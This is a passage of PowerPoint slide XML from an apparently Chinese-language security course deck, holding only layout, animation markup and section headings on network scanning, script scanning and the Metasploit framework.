                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="29" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="60"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="34" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="38" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="39" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="44" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="47" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="48" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="49" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
